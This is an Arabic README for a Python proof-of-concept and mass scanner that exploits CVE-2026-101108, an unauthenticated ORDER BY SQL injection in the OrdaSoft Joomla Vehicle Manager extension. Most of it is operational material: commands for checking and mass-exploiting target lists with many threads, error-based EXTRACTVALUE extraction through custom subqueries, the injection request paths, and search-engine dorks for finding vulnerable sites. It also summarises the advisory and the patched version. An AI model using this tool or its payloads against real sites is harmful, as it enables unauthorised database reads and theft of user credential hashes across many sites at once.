
سكربت PoC بلغة Python 3 وماسح ضخم لـ CVE-2026-101108، وهو ثغرة حقن SQL غير مصادق عليها في ORDER BY في OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager).
Python 3 PoC لـ CVE-2026-101108 — إضافة Joomla OrdaSoft Vehicle Manager (Free) ≤ 6.5.7. تم إصلاحها في 6.5.8+.
| PoCbit | https://pocbit.org/pocs/cve-2026-101108 |
| Catalog | https://pocbit.org/pocs/ |
| Component | com_vehiclemanager |
| File | site/vehiclemanager.php |
| Parameters | order_field, order_direction → ORDER BY (غير مُقتبس) |
| Auth | لا شيء (عروض الفئة العامة / البحث / جميع المركبات) |
| CWE | CWE-89 حقن SQL |
| CVSS 4.0 | 9.3 حرج (Joomla CNA) |
Vehicle Manager (Free) هي إضافة OrdaSoft تقدّم إعلانات المركبات (الفئة، البحث، جميع المركبات) في Joomla. في الإصدارات 6.5.7 وما قبلها، تُعالَج معاملات الترتيب order_field و order_direction داخل site/vehiclemanager.php: يُطبَّق التهريب (escaping) على المدخلات، لكن لأن القيمة تُدرَج في عبارة ORDER BY بدون علامات اقتباس، يبقى التهريب غير فعّال ضد SQLi (وصف CNA).
يشكّل هذا خطراً حرجاً من حيث قراءة/كتابة قاعدة البيانات، وتجزئات مستخدمي Joomla، وسلامة الموقع، دون الحاجة إلى مصادقة المهاجم. قم بالترقية إلى 6.5.8 أو أحدث.
قد يُمرِّر كود Joomla/PHP النموذجي مدخلات المستخدم عبر "مُنقِّح" يهرّب علامات الاقتباس من أجل القيم النصية (string literals). في ORDER BY، أسماء الأعمدة والتعبيرات ليست قيماً نصية — إذ يُدمَج مفتاح الترتيب كبنية SQL. يزوّد المهاجم بتعبيرات مثل الاستعلامات الفرعية القائمة على الأخطاء بدلاً من اسم عمود حقيقي. يوثّق نص CNA الخاص بـ CVE-2026-101108 صراحةً نمط تجاوز التهريب هذا.
نقاط الدخول المجهولة على الواجهة الأمامية المتأثرة:
showCategory)search / المهام ذات الصلة)showVehicles وما شابه)| الوضع | السلوك |
|---|---|
| check | بصمة المكوّن + إصدار البيان، اكتشاف catid/Itemid، تأكيد SQLi |
| exploit | استعلام مزدوج بنمط EXTRACTVALUE قائم على الأخطاء عبر ORDER BY |
| mass | --list + -j للفحص الجماعي أو الاستخراج الجماعي |
متجهات الحقن المُجرَّبة (أول نجاح يفوز في وضع exploit):
order_field GETorder_direction GET (asc,<subquery>)order_field POSTorder_direction POSTحقول JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component.
cd CVE-2026-101108
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| العلم | المعنى |
|---|---|
--aggressive | وضع الفحص يحاول أيضاً تسريب SELECT VERSION() |
--subquery | استعلام SELECT الداخلي للحمولة القائمة على الأخطاء (MySQL) |
--vector | فرض أحد متجهات ORDER BY الأربعة |
--exploited-list | تسريبات مفصولة بعلامات جدولة عند نجاح الاستغلال |
--no-color | واجهة سطر أوامر بسيطة (يُحترم NO_COLOR) |
رموز الخروج: وضع exploit 0 عند exploited: true؛ وضع check 0 عند exploitable_candidate.
مسار الفئة (تُضاف معاملات الترتيب بواسطة PoC):
GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1
خط الأساس لمسار البحث الذي يبنيه PoC:
GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1
عندما يكون قابلاً للقراءة:
/administrator/components/com_vehiclemanager/vehiclemanager.xmlالإصدار ≤ 6.5.7 → likely_vulnerable_version. ≥ 6.5.8 → patched_version.
body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"
صدّر المضيفين إلى targets.txt (عنوان URL أساسي واحد لكل سطر)، ثم check → hits → exploit على الأصول المصرّح بها فقط.
نافذة الإفصاح نفسها الخاصة بثغرات Real Estate Manager (مثل CVE-2026-100752 / CVE-2026-100753): تلقّت إضافات OrdaSoft Joomla المتعددة إصلاحات SQLi/XSS. إذا كنت تشغّل Vehicle Manager، فقم بترقيع جميع مكوّنات OrdaSoft التي تنشرها.
| CVE | المنتج | المشكلة | الإصلاح |
|---|---|---|---|
| CVE-2026-101108 | Vehicle Manager (Free) | SQLi بدون مصادقة في ORDER BY | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | SQLi بدون مصادقة في ORDER BY | 6.7.9 |
الفضل (CNA): Ala Arfaoui.
com_vehiclemanager SQLi (إصدارات أقدم، معاملات البحث) — مختلفة عن لكن مرتبطة بسطح المكوّناختبار أمني مصرّح به والتحقق من الترقيع فقط.
CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108